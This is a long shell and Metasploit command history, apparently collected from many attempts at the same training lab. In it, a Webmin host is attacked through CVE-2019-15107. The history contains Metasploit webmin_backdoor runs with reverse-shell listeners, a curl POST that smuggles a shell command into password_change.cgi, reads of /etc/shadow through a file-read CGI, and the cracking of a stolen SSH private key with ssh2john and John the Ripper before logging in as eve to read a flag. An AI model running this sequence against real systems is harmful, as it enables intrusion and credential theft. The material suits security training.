ping
ping 172.18.1.5
arp -a
arp -a
vague
telnet 172.18.1.5
nmap --help
nmap 172.18.1.5
ssh
ssh 172.18.1.5
nmap --help | grep "sV
"
nmap --help | grep "sV"
nmap -sV 172.18.1.5
curl 172.18.1.5:10000
curl 172.18.1.5:10000 > tmp.html
less tmp.html
curl 172.18.1.5:10000/updown/upload.cgi
apt install lynx
curl 172.18.1.5:10000/syslog/save_log.cgi?view=1&file=/etc/shadow
curl 172.18.1.5:10000/syslog/save_log.cgi?view=1&file=/etc/
ls /etc/shadow
cat /etc/shadow
curl 172.18.1.5:10000/syslog/save_log.cgi?view=1&file=/etc/shadow
msfconsole
search webmin
vim tmp.sh
chmod +x tmp.sh
./tmp.sh 172.18.1.5
ssh root@172.18.1.5
msfconsole
msfconsole
search
search exploit/run
search exploit/unix
search exploit/unix qeb
search exploit/unix Webmin
search exploit/unix/Webmin
search exploit/unix Webmin
search exploit/unix | grep s
search exploit/unix | grep Webmin
search -h
search CVE-2019-15107
use exploit/unix/webapp/webmin_backdoor
show
show options
run
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
nmap -sp 172.18.1.5
sudo nmap 172.18.1.5
nmap 172.18.1.5
nmap -p 22 172.18.1.5
nmap -p 10000 172.18.1.5
nmap 172.18.1.5
nmap -sV 172.18.1.5
msfconsole
msfconsole
use exploit/linux/http/webmin_backdoor
show
show exploits
use exploit/linux/http/webmin_packageup_rce
show targets
set TARGET 0
show options
exploit
exit
msfconsole
search name:webmin
use exploit/unix/webapp/webmin_backdoor
set RHOST 172.18.1.5
set RPORT 10000
exploit
set LHOST 0.0.0.0
exploit
show options
exploit
set LHOST 10.1.135.83
check
exploit
show options
exploit
ls
cd /root/
ls
cat flag.txt
nano ssh2john.py
nano ssh2john.py
cd /home/
ls
cd debian
ls
ls -a
nano .ssh
cd .ssh
ls
nano authorized_keys
cd ..
nano .bashrc
cd .config/
ls
cd pulse/
ls
nano cookie
cd ..
cd ..
nano .bash_history
ls
ls -a
cd .ansible/
ls
ls -a
cd tmp
ls
cd ..
cd ..
cd .bashrc
cd ..
ls -a
cd debian
cd .bashrc
nano .bashrc
history
ls -a /home/eve
ls -a /home/
less .bash_history
ls -a
less .bash_history
nano .bash_logout
nano .profile
nano .bashrc.original
nano .ssh
cd .ssh
ls
nano authorized_keys
cd ..
ls
ls -a
cd .config/
ls -a
cd pulse/
ls
nano cookie
cd ..
cd ..
cd .ssh/
ls -a
nano authorized_keys
cd ..
cd ..
cd ..
ls
cd root
ls
ls -a
msfconsole
use exploit/unix/webapp/webmin_backdoor
set LHOST 10.1.135.83
set RHOST 172.18.1.5
set RPORT 10000
exploit
exit
msfconsole
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
ls
nmap 172.18.1.5
nmap -sV 172.18.1.5
metasploit
Metasploit
msfconsole
search webmin
search 2019-15107
use 0
options
set rport 10000
run
set rhost 172.18.1.5
run
check
run
exploit
set lhost 10000
exploit
set lhost 10.1.0.1
exploit
set lhost 100.100.100.6
exploit
set lhost 172.18.1.5
exploit
set lhost 10.1.135.83
exploit
check
show options
run
msfconsole
show options
check
run
check
show options
exit
set rhost 172.18.1.5
search 2019-15107
use 0
set rport 10000
check
set lhost 10.1.135.83
run
check
run
check
show options
exploit
check
exploit
options
ls
ssh root@172.18.1.5
ls
cat ssh2john.py
ls
man nmap
nmap 172.18.1.5
man nmap
nmap -sV -p 10000 172.18.1.5
msfconsole
show exploits
search webmin
search 47230
use exploit/47230
show options
set rhosts 172.18.1.5
show options
run
show options
set lhost 10.1.135.83
run
ls
sessions
ssh root@172.18.1.5
exit
sessions -i 1
sessions
msfconsole
sessions
use exploit/47230
show options
set rhosts 172.18.1.5
set lhost 10.1.135.83
run
sessions
run
show options
run
set LPORT 4445
show options
msfconsole
use exploit/47230
show options
set rhosts 172.18.1.5
set lhost 10.1.135.83
show options
run
set LPORT 4446
run
sessions
sessions -i 1
sessions
sessions -i 1
exit
ls
exit
ls
scan --help
nmap --help
ping 172.18.1.5
nmap 172.18.1.5
nmap -sV 172.18.1.5
nmap --help
msf --help
Metasploit --help
msfconsole
show
show exploits
use exploit/47230
help
back
search type:exploit name:Webmin
show
use exploit/unix/webapp/webmin_backdoor
show options
check
set RHOSTS=172.18.1.5
set RHOSTS 172.18.1.5
check
run
set LHOST 172.18.1.5
run
set LHOST 10.1.135.83
check
run
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
show options
exploit
show options
run
help
show options
run
exit
ls
msfconsole -q
use exploit/unix/webapp/webmin_backdoor
show options
set LHOST 10.1.135.83
set RHOST 172.18.1.5
exploit
show options
nmap 172.18.1.5
nmap -sV 172.18.1.5
msfconsole
use exploit/linux/webmin
use exploit/linux/
use eploit/unix/webapp/webmin_backdoor
use epxloit/unix/webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
show option
show options
set RHOST 172.18.1.5
set RPORT 1000
set LHOST 10.1.135.83
check
run
exploit
show options
set RPORT 10000
exploit
cd /root/
cat flag.txt
msfconsole
use exploit/unix/webapp/webmin_backdoor
set RPORT 10000
set LHOST 10.1.135.83
set RHOST 172.18.1.5
run
chmod 0600 id_rsa
chmod 0600 id_rsa
ssh -iid_rsa eve@10.1.17.4
ls
clear
ls
httpd
ping 172.18.1.5
ifconfig
ssh root@172.18.1.5
nmap
17 2.18.1.5
nmap --help
nmap 172.18.1.5
nmap -v 172.18.1.5
nc -z -nv 172.18.1.5
nc -z -nv 172.18.1.5 20-80
sudo us 172.18.1.5
nmap -sU 172.18.1.5
sudo nmap -sT -p- 172.18.1.5
nmap --help
nmap --help | grep flag
sudo nmap -r 172.18.1.5
sudo nmap -S 172.18.1.5
sudo nmap -sV 172.18.1.5
sudo nmap -v -S 172.18.1.5
sudo nmap -v 172.18.1.5
nmap -sV 172.18.1.5
ls
cd /root/
ls
cat ssh2john.py
clear
vim vun.sh
chmod 600 vun.sh
ls
chmod +x vun.sh
./vun.sh
./vun.sh 172.18.1.5
cat ssh2john.py
cat ssh2john.py | grep -e '\d\d\d\d\d'
clear
cat ssh2john.py
python ssh2john.py
python3 ssh2john.py
ls .*
cat .ssh/authorized_keys
ls .config/pulse/
ls .config/systemd/
ls .config/systemd/user/
./vun.sh 172.18.1.5
msfmsf
msfconsole
exit
msfconsole
search
search CVE-2019-15107
use exploit/unix/webapp/webmin_backdoor
help
check 172.18.1.5
show options
help
set RHOSTS 172.18.1.5
show options
run
set LPORT 5555
run
set LPORT 4444
set LHOST localhost
run
set LHOST 172.18.1.5
run
set LHOST localhost
run
show options
set LHOST 10.1.135.83
run
sdf
ls
exit
nmap -sV 172.18.1.5
ifconfig
msfconsole
use exploit/unix/webapp/webmin_backdoo
use exploit/unix/webapp/webmin_backdoor
show options
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
show options
run
exit
cd /home/
ls
cd debian/
ls
ls .*
cat .ssh/authorized_keys
cd ..
ls
ls .*
cd root/
ls
ls .*
ls
cd ..
cat ~/.bashrc
cat ~/.bash_history
history
msfconsole
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
run
check
run
check
run
exit
quit
exit -y
ls
cd ..
ls
ls
cd /root/
ls
vim out.txt
./ssh2john.py out.txt >hash
python3 ssh2john.py out.txt >hash
cat hash
exit
ls
ifconfig
ssh 172.18.1.5
ssh root@172.18.1.5
^[[200~
ifconfig
nmap 172.18.1.5
systemctl
service --status-all
nmap -sP 172.18.1.5/24
ping 172.18.1.5/24
ping 172.18.1.5
netstat -tulpn
netstat -luntp
services
ipconfig
ifconfig
grep -w 22 /etc/services
grep -w 22 /etc/services
sudo netstat -tulpn | grep LISTEN
ssh -b 172.18.1.5
ssh -D 172.18.1.5
ssh -L 172.18.1.5
ssh root@172.18.1.5/22
ssh root@172.18.1.5
ssh -L root@172.18.1.5
ssh -L 172.18.1.5
hostname -I
systemctl --type=services
systemctl --type=service
netstat -a -p
\nnetstat
nestat -a -b
nmap -sP
nmap -sP 172.18.1.5/24
nmap -sT 172.18.1.5/24
nmap -sT -O 172.18.1.5/24
nmap -sT -O root@172.18.1.5/24
sudo nmap -sT -O 172.18.1.5/24
nmap -A 172.18.1.5 -p 10000
sudo nmap -sT -O 172.18.1.5/24
systemctl systemctl -l status snet-sensor-mgmt
systemctl  -l status snet-sensor-mgmt
cat /etc/webmin/miniserv.conf
sh CVE-2019-15107.sh 172.18.1.5
sh CVE-2019-15107 172.18.1.5
sh CVE-2019-15107 172.18.1.5/10000
sh CVE-2019-15107.sh 172.18.1.5/10000
sudo apt-update webmin
sudo apt-install metasploit-framework
sudo apt install metasploit-framework
cd exploit/linux
cd /exploit/linux
nano exploit.txt
arp -a
sudo pacman -Syu nmap
arp -a
ping  172.18.1.5
nmap -sT -p- 172.18.1.5
nc -z -v 172.18.1.5 1-65533
lsof -i -P -n
lsof -i -P -n | grep 172.18.1.5
netstat -tulpn
netstat -tulpn | grep 172.18.1.5
nmap -sT -p- 172.18.1.5
nmap 172.18.1.5
nmap ==help
nmap --help
nmap -sO 172.18.1.5
nmap -sO 172.18.5.1
nmap =sL
nmap -sL
nmap -sL 172.18.1.5
nmap
nmap -sV 172.18.1.5
nmap -sT -p- 172.18.1.5
metasploid
metasploit
db_nmap
db_nmap hosts
db_nmap services
help
check 172.18.1.5
db_nmap 172.18.1.5
db_nmap -sV 172.18.1.5
cd exploit
search
search cve:2019
use exploit/linux/http/webmin_packageup_rce
set 172.18.1.5
set LHOST 172.18.1.5
set LHOST localhost
set TARGET 172.18.1.5
set PAYLOAD linux/shell
set PAYLOAD cmd/unix/
set PAYLOAD cmd/unix/reverse_ssh
exp
exploit
use .*netapi.*
set RHOSTS localhost
set USERNAME kali
set PASSWORD kali
exploit
set LHOST 172.18.1.5
exploit
set TARGET 172.18.1.5
exploit
set RHOSTS 172.18.1.5
exploit
set TARGET 172.18.1.5
exploit
set target 172.18.1.5
exploit
show options
run
set TARGETURI 172.18.1.5
run
show options
set TARGETURI http://172.18.1.5
run
show options
set LHOST localhost
run
quit
msfconsole
search cve:2019
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
set LHOST localhost
run
set LHOST ReverseListenerBindAddress
set LHOST 10.1.135.83
run
ls
touch rsa_key
nano rsa_key
python ssh2john.py
python ssh2john.py rsa_key
john
john --help
john /usr/share/wordlists/rockyou.txt
python ssh2john.py rsa_key > rsa
john rsa /usr/share/wordlists/rockyou.txt
john rsa wordlist:/usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt
john rsa wordlist:/usr/share/wordlists/rockyou.txt
john --help
john rsa --wordlist=/usr/share/wordlists/rockyou.txt
ssh 10.1.17.4
ssh eve@10.1.17.4
ssh eve@10.1.17.4 rsa
ssh --help
ssh -i rsa_key eve@10.1.17.4
chmod 600 rsa_key
ll
ls
cd top-secret/
ls
cat flag.txt
ping 172.18.1.5
nmap -sC -sV  172.18.1.5
nmap  172.18.1.5
nmap -sC -sV -p10000  172.18.1.5
search webmin
use exploit/unix/webapp/webmin_upload_exec
set
help
show
settings
options
search Webmin
use exploit/linux/http/webmin_backdoor
options
set RHOSTS 172.18.1.5
run
set LHOST 127.0.0.1
run
set LHOST 0.0.0.0
run
ip addr show
set LHOST 10.1.135.83
ssh --help
ls
cd .ssh
ls
mdkir .ssh
mkdir .ssh
cd .ssh
ls
vim id_rsa
chmod 600 id_rsa
ls -l
ssh eve@10.1.17.4 -i id_rsa
ls
..
ls
./ssh2john.py .ssh/id_rsa
./ssh2john.py .ssh/id_rsa > id_rsa_hash
john
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
cd .ssh
ls
cd top-secret/
ls
cat flag.txt
ping 172.18.1.5
nmap 172.18.1.5
nmap --help
sudo nmap 172.18.1.5 -p 10000 -O -sC
sudo nmap 172.18.1.5 -sC
sudo nmap 172.18.1.5 -sV
ls
ls *
sudo nmap 172.18.1.5 -p 10000 --script vuln
sudo nmap 172.18.1.5 -p 10000 --script nmap-vulners,vulscan
sudo nmap 172.18.1.5 -p 10000 --script nmap-vulners
sudo nmap 172.18.1.5 -p 10000 --script vulners
sudo nmap 172.18.1.5 -p 10000 -sV --script vulners
sudo nmap 172.18.1.5 -p 10000 -sV --script vulners
ls
ls Downloads
sudo nmap 172.18.1.5 -p 10000 -sV --script Downloads/vulners.nse
sudo nano /etc/hosts
sudo ls
?
search type:exploit name:webmin
info exploit/linux/http/webmin_backdoor
set RHOSTS 182.18.1.5
use exploit/linux/http/webmin_backdoor
run
set LHOST 10.1.135.83
run
show options
set RHOSTS 172.18.1.5
show options
ping 10.1.17.4
nano id_rsa
ls
python ssh2john.py id_rsa > id_rsa.hash
cat id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
ssh eve@10.1.17.4 -i id_rsa
chmod 600 id_rsa
ll
ls -la
cd top-secret/
ls
cat flag.txt
arp -a
nmap -sP 172.18.1.5
nmap -sT -O 172.18.1.5
nmap -sT 172.18.1.5
nmap -sT 172.18.1.5/22
nmap -sT 172.18.1.5/10000
nmap -sT 172.18.1.5/32
nmap -sn 172.18.1.5/32
nmap -sT 172.18.1.5/32
clear
arp -a
nmap -sT 192.168.130.237
nmap -Pn 192.168.130.237
nmap -sV 178.18.1.5
nmap -sV 172.18.1.5
sh CVE-2019-15107.sh
sh CVE-2019-15107.sh 172.18.1.5:10000
msf
search
search cve:2009 type:exploit
use exploitlinux
use exploit/linux
use exploit/linux/http/gitlist_exec
run
exit
msfconsole
search cve:2009 type:exploit
search
search -S root
search -h
search path /root
search -path /root
search path:root
search cve:78
search cve:78 path:root
search path:exploit/linux
search path:exploit/linux/root
search path:exploit/linux
run
exploit
use run
search -f *.txt
search -d
search -d -f:*.txt
search -h
search path:root
search webmin
use explot/linux/http/webmin_backdoor
use expliot/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
show option
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
run
exit
msfconsole
clear
arp -a
nmap -sT 172.18.1.5
nmap -sT 192.168.128.1
nmap -sT 172.18.1.1
nmap -sT 10.1.0.1
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
ls
nano haha.txt
cat haha.txt
python3 ssh2john.py haha.txt > hash
ls
cat hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ls
cd /home/kali/.john
ls -a
cat john.log
cat john.pot
cd ..
chmod 0600 id_rsa
chmod 0600 haha.txt
ls -a
cd top-secret/
ls -a
cat flag.txt
man ping
man pingE
man ping 172.18.1.5
ping 172.18.1.5
nmap 172.18.1.5
nmap -n 172.18.1.5
nmap -sT 172.18.1.5
nmap -sS 172.18.1.5
sudo nmap -sS 172.18.1.5
sudo nmap -sV 172.18.1.5
mfsconsole
msfconsole
help
search
search port 10000
search
msfconsole -q
search
search cve:2019-15107
search exploit/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
show targets
set TARGET 1
show options
exploit
set RHOSTS 172.18.1.5
show options
exploit
man nmap
set LHOST localhost
exploit
nc -l 4444
set LHOST 172.18.1.5
exploit
show options
set TARGET 0
show options
exploit
set LHOST localhost
exploit
set LHOST 127.0.0.1
exploit
show targets
show options
exploit
help
You are binding to a loopback address by setting LHOST to ::1. Did you want ReverseListenerBindAddressYou are binding to a loopback address by setting LHOST to ::1. Did you want ReverseListenerBindAddressq
set LHOST 172.18.1.5
exploit
set LHOST localhost
show options
webmin
apt search webmin
set TARGETURI /root/flag.txt
exploit
set TARGETURI /
exploit
set TARGETURI /root
exploit
set TARGETURI /
exploit
set LHOST 10.1.135.83
check
exploit
show options
sudo nmap 100.100.100.244
nc
nc -u
netstat -u
netstat -u -t
ls
exploit
man ssh
ls /kali
ls
pwd
ls
cat ssh2john.py
ls
eve@10.1.17.4
eve@10.1.17.4
ls Documents
ls
use cve:2019-15706
use cve:2019-15107
options
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
ls
touch id_rsa
vim id_rsa
touch rockyou.txt
vim rockyou.txt
./ssh2john.py
./ssh2john.py id_rsa
./ssh2john.py id_rsa > hash
john hash
ls
ls
ls /usr/share/wordlists
john --wordlist=/usr/share/wordlists/rockyou.txt hash
./ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
cat id_rsa
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
python3 ssh2john.py id_rsa > hashls
python3 ssh2john.py id_rsa > hashls
ls
echo '' > hash
vim hash
cat hash
cat hash
echo hash > id_rsa
python3 ssh2john.py id_rsa > hash
ls
vim id_rsa
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ls
cat hashls
rm hashls
ls
ssh eve@10.1.17.4 -i id_rsa
ssh eve@10.1.17.4 -i id_rsa
ls
ls -a id_rsa
ls -l id_rsa
chmod g-r id_rsa
chmod o-r id_rsa
ls
tree top-secret/
ls top-secret/
cat top-secret/flag.txt
nmap 172.18.1.5
nmap 172.18.1.5
nmap --version-all 172.18.1.5
nmap -v -A 172.18.1.5
nmap 172.18.1.5
man nmap
nmap 172.18.1.5
sudo nmap -sV 172.18.1.5
sudo nmap -v --script vuln 172.18.1.5
sudo nmap -sV --script vuln 172.18.1.5
sudo nmap -sV --script vuln 172.18.1.5
sudo nmap -sV --script vuln 172.18.1.5 clear
nmap --script nmap-vulners/ -sv 172.18.1.5
nnamp 172.18.1.5
nmap 172.18.1.5
nmap -p T:10000 -sV --script vuln 172.18.1.5
nmap -p T:10000 -sV --script vuln 172.18.1.5
man nmap
nmap -sv 172.18.1.5
nmap -sv --version-trace 172.18.1.5
clear
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV --script dos 172.18.1.5
nmap -sV --script dos 172.18.1.5
man metasploit
metasploit
python
man curl
python
man curl
ls
git clone https://github.com/jas502n/CVE-2019-15107
ls
cd CVE-2019-15107
ls
ls
micro CVE_2019_15107.py
nano CVE_2019_15107.py
python CVE_2019_15107.py https://172.18.1.5:10000 cmd
python CVE_2019_15107.py https://172.18.1.5:10000 cmd
man curl
ls
cd CVE-2019-15107
ls
cat CVE_2019_15107.py
cat CVE_2019_15107.py
cat CVE_2019_15107.py
python CVE_2019_15107.py https://172.18.1.5:10000 cmd
python CVE_2019_15107.py https://172.18.1.5:10000 ls
man curl
man curl
curl -X POST -d   "user=rootxx
curl -X POST -d   "user=rootxx
curl -X POST -d   "user=rootxx
curl -X POST -d "user=rootxx&pam=&expired=2&old=test|ls%new1=test2&new2=test2" https://10.10.20.166:10000/password_change.cgi
curl -X POST -d "user=rootxx&pam=&expired=2&old=test|ls%new1=test2&new2=test2" https://172.18.1.5:10000/password_change.cgi
metasploit
msf
search cve:2019
search cve:2019-15107
use eploit/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
show options
set SRVHOST 172.18.1.5
show options
set SSL true
show options
set SSL false
show options
exploit
exit
use eploit/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
show options
exploit
set LHOST 0.0.0.0
exploit
show option
show options
set LHOST 10.1.135.83
use exploit/linux/http/webmin_backdoor
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
ls
cd ..
ls
touch id.txt
nano id.txt
mv id.txt id_rsa
python ssh2john.py id_rsa > phrase.txt
cat phrase.txt
python ssh2john.py id_rsa > hash
ls
cd /
ls
cd /usr
ls
cd share
ls
cd john
ls
john hash
cd ..
ls
cd wordlists
ls
ls metasploit
cd ..
ls
cd wordlists
ls
ls dirb
ls dirbuster
ls fasttrack.txt
ls fern-wifi
ls wfuzz
john --wordlist=/usr/share/wordlists/rockyou.txt  hash
lsls
ls
cd /
ls
cd home
ls
cd user
ls
ls
ssh ls
ls
ssh -i id_rsa eve@10.1.17.4
chmod 0600 id_rsa
ssh -i id_rsa eve@10.1.17.4
chmod 0600 id_rsa
ssh -i id_rsa eve@10.1.17.4
ssh -i id_rsa eve@10.1.17.4
ls
cd top-secret/
ls
cat flag.txt
exploit
nmap 172.18.1.5
vague -help
vague
vague
vague
netstat -a | grep 10000
netstat -a
netstat -a
lsof -i :10000 -S
netstat -lpn | grep 10000
sudo netstat -lpn | grep 10000
man nmap
nmap -sV 172.18.1.5
python
vim script.py
vim script.py 10.1.125.83   172.18.1.5
python
python
vim script.py
python script.py
vim script.py
python script.py
vim script.py
python script.py
ls
vim script.pyc
vim script.py
python script.py
vim script.py
python script.py
vim script.py
python script.py
vim script.py
python script.py
vim script.py
python script.py
ls
wget https://prdownloads.sourceforge.net/webadmin/webmin-1.890.tar.gz
tar xf webmin-1.890.tar.gz
cd webmin-1.890
ls
vim ./setup.sh
cd ..
rm -rf webmin-1.890
ls
rm webmin-1.890.tar.gz
ls
ls
nmap 172.18.1.5
vim script.py
python script.py
vim script.py
vim script.py
python script.py https://172.18.1.5:10000 cmd
python script.py http://172.18.1.5:10000 cmd
ssh 172.18.1.5
msf
ls
show options
exploit
run
exploit{linux
search
search sve:2019 type:exploit
use 47230
show options
use exploit/linux/
man search
search webmin
use exploit/linux/http/webmin_backdoor
exit
msfconsole
run exploit/linux
use exploit/linux/http/webmin_backdoor
help
run
set RHOSTS 172.18.1.5
run
help
check 172.18.1.5
exploit 172.18.1.5
exploit 172.18.1.5 -J
exploit -J 172.18.1.5
exploit -J
set LHOST 172.18.1.5
exploit
exploit -J
run
msfconsole
use exploit/linux/http/webmin_backdoor O
ac
AC
C
O
T
exit
msfconsole
use exploit/linux/http/webmin_backdoor H
RHOST
get
connect
ls
sessions
show options
set RHOSTS 172.18.1.5
help
run
show options
set LHOST 10.1.135.83
run
sessions
run
show option
show options
python
ls
cd Documents
ls
python script.py
python script.py
python
ls
python ssh2john.py
vim script.py
python ssh2john.py key
python ssh2john.py
vim ssh2john.py
python ssh2john.py ./key
python ssh2john.py
ls
python ssh2john.py key
john
ls
john -wordlist /usr/share/wordlists key
john -wordlist /usr/share/wordlists.txt key
john -wordlist /usr/share/wordlists/rockyou.txt  key
python ssh2john.py ./key
ls
vim ssh2john.py
john -wordlist /usr/share/wordlists/rockyou.txt  key_data
john --format=SSH -wordlist /usr/share/wordlists/rockyou.txt  key_data
john  -wordlist=/usr/share/wordlists/rockyou.txt  key_data
ssh eve@10.1.17.4
ssh -i key eve@10.1.17.4
chmod 600 key
ls
cd top-secret/
ls
vim flag.txt
cat flag.txt
ssh -i key eve@10.1.17.4
ping 172.18.1.5
man nmap
nmap 172.18.1.5
man nmap
nmap -A 172.18.1.5
msf --version
msfcli -h
msfcli -h
--help
-h
help
ls
cd Downloads
ls
use 47230.rb
172.18.1.5
show targets
show options
run
connect 172.18.1.5
run
check
set RHOST 172.18.1.5
check
run
show options
set LHOST 172.18.1.5
run
set LPORT 10000
run
search
search cve 2019-15107
use loit/linux/http/webmin_backdoor
run
set RHOST 172.18.1.5
run
set  LHOST 172.18.1.5
run
show options
set LPORT 10000
run
show options
exploit
set LHOST 10.1.135.83
set LPORT 4444
ls
python3 ssh2john.py
nano id_rsa
nano id_rsa
python3 ssh2john.py id_rsa
python3 ssh2john.py --help
python3 ssh2john.py id_rsa --wordlist=rockyou.txt
python3 ssh2john.py id_rsa > id_rsa.john
cat id_rsa.john
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
scp -r * eve@10.1.17.4:/home/eve/\n
scp -r * eve@10.1.17.4:/home/eve/
ssh eve@10.1.17.4
man ssh
ssh -i rsa_id eve@10.1.17.4
ls
ssh -i id_rsa eve@10.1.17.4
chmod 600 id_rsa
ls
cd top-secret/
ls
cat flag.txt
cd ..
cd ..
ls
cd zdislav/
ls
ls -a
cd ..
cd ..
ls
cd home
ls
cd user/
ls
ls -a
cd ..
ls
cd eve
ls
ls -a
cd top-secret/
ls -a
cat flag.txt
http-ip-address
ip a
echo $(wget -qO - https://api.ipfy.org)
echo $(curl -s https://api.ipfy.org)
systemd-resolve --status | grep Current
ip r
arp-scan -l
arp-scan -h
arp-scan --localnet
arp-scan -V
arp -a
arp-scan
arp-scan -n 172.18.1.5/20
arp-scan -n 172.18.1.5
arp-scan -n
arp-scan -n 172.18.1.5/24
arp-scan -S 172.18.1.5
ifconfig
arp -a
traceroute --help
traceroute 172.18.1.5
traceroute -I 172.18.1.5
traceroute -p 22 172.18.1.5
traceroute -p 23 172.18.1.5
traceroute -p 53 172.18.1.5
traceroute -p 67 172.18.1.5
traceroute -p 22 172.18.1.5
traceroute -p 23 172.18.1.5
nmap 172.18.1.5
nmap -p 22 172.18.1.5
nmap -p 10000 172.18.1.5
nmap -p- 172.18.1.5
nmap -sV 172.18.1.5
use exploit/linux/http/webmin_backdoor
exploit
file: /root/
run
show options
q
quit
msfconsole
use exploit/unix/webapp/webmin_show_cgi_exec
exploit
show info
show targets
show payloads
quit
msfconsole
run
use exploit/linux/http/webmin_backdoor
exploit
run
show payloads
show rhosts
quit
msfconsole
search -h
search cve:2019-15107 type:exploit platform:-linux
search cve:2019-15107
use exploit/linux/http/webmin_backdoor
check
run
exploit
show options
set RHOSTS 'file:/root/flag.txt'
exploit
set RHOSTS 10.10.127.20
set SSL true
run
set LHOST tun0
set LHOST tunO
set RHOSTS 10.10.127.20
set SSL true
set LHOST tunO
show options
172.22.2.16
set LHOST tunO
set LHOST 172.22.2.16
run
show options
set LHOST 10.9.6.22
run
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
run
set SSL true
run
quit
msfconsole
use exploit/linux/http/webmin_backdoor
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
set SSL true
show options
exploit
run
check
rexploit
show options
exploit
exit
msfconsole
use exploit/linux/http/webmin_backdoor
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
exploit
exit
msfconsole
ls
python3 ssh2john.py key
ls
python3 ssh2john.py key
python3 ssh2john.py key
python3 ssh2john.py key.txt
ls -a
ls
python3 ssh2john.py key.txt
use exploit/linux/http/webmin_backdoor
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
exploit
exit
msfconsole
python3 ssh2john.py key.txt
python3 ssh2john.py key.txt > hash.txt
john hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
ssh
ssh -i key.txt -l eve 10.1.17.4
chmod 0600 key.txt
ls
cd top-secret
ls
cat flag.txt
masscan -p1234 --echo
masscan -p1234 --echo
masscan -p1234 --echo
nmap -v -sL 178.18.1.5
nmap --scanflags httpd 178.18.1.5
nmap -Pn --scanflags httpd 178.18.1.5
nmap -Pn --scanflags httpd 178.18.1.5
nmap -sV 178.18.1.5
nmap -Pn --scanflags httpd 178.18.1.5
nmap -sV 178.18.1.5
nmap -Pn 178.18.1.5
nmap -sV 178.18.1.5
nmap -sV 178.18.1.5
nmap -sV 172.18.1.5
nmap -help
nmap -help
searchsploit Webmin
nmap -help
search
show options
use 172.18.1.5
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
set RPORT 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
run
exit
nmap -help
ls
ssh2john.py
ls
ssh2john.py
python ssh2john.py
nmap -help
python ssh2john.py sshkey.txt
python ssh2john.py sshkey.pem
ls
python ssh2john.py sshkey
cd ..
ls
cd user
cd share
cd ..
cd ..
ls
cd usr
cd share
cd wordlists
ls
cat rockyou.txt
john rockyou.txt
john rockyou.txt
cd ..
cd ..
cd ..
ls
cd root
ls
cd ..
ls
cd home
ls
cd kali
ls
john --wordslist=../../usr/share/wordlists/rockyou.txt sshkey
john --wordslist=rockyou.txt sshkey
john -help
john --wordlist=rockyou.txt sshkey
john sshkey --wordlist=rockyou.txt
john sshkeyout --wordlist=rockyou.txt
john sshkey_out --wordlist=rockyou.txt
ssh 10.1.17.4
ssh 10.1.17.4
ssh eve@10.1.17.4
ssh eve@10.1.17.4 -i sshkey_out
chmod 0600 sshkey_out
ssh eve@10.1.17.4 -i sshkey_out
ssh -i sshkey_out eve@10.1.17.4
ssh -i sshkey eve@10.1.17.4
chmod 0600 sshkey
ls
cd top-secret/
ls
cat flag.txt
ping 172.18.1.5
nmap 172.18.1.5
nmap
nmap 172.18.1.5 10000
nmap 172.18.1.5 -p 10000
nmap 172.18.1.5 -p 10000 -sv
nmap 172.18.1.5 -sv
nmap 172.18.1.5 -sV
nano exploit.sh
msfconsole -h
msfconsole --help
search -h
search cve:2019-15107
run exploit/linux/http/webmin_backdoor
exploit exploit/linux/http/webmin_backdoor
show options
show options exploit/linux/http/webmin_backdoor
run exploit/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
show options
use exploit/linux/http/webmin_backdoor -LHOST 172.18.1.5 -LPORT 10000
run
run sasssdsasssksjs
sssestsssssesesgsgswsssgstshsqsws
set RHOSTS 172.18.1.5
set LPORT 10000
set RPORT 10000
exploit
set LHOSTS 172.18.1.5
exploit
set LHOST 172.18.1.5
exploit
exit
bash
exploit -z
run "bash"
run bash
exploit -J
ls
set LHOST 10.1.135.83
exploit
exit
msfconsole
nano pk
ls
sshjohn.py
ssh2john.py
python ssh2john.py
python ssh2john.py pk
python ssh2john.py pk > passh
ls
john passh --wordlist /usr/share/wordlists/rockyou.txt
ls
john passh --wordlist /usr/share/wordlists/rockyou.txt
john passh --wordlist=/usr/share/wordlists/rockyou.txt
echo "10.1.17.4" > ip
ls
cat pk
echo "10.1.17.4" > ip
ssh -o "IdentitiesOnly=yes" -i ./pk 10.1.17.4
ssh -o "IdentitiesOnly=yes" -i ./pk 10.1.17.4
ls
cat passh
ls
ls
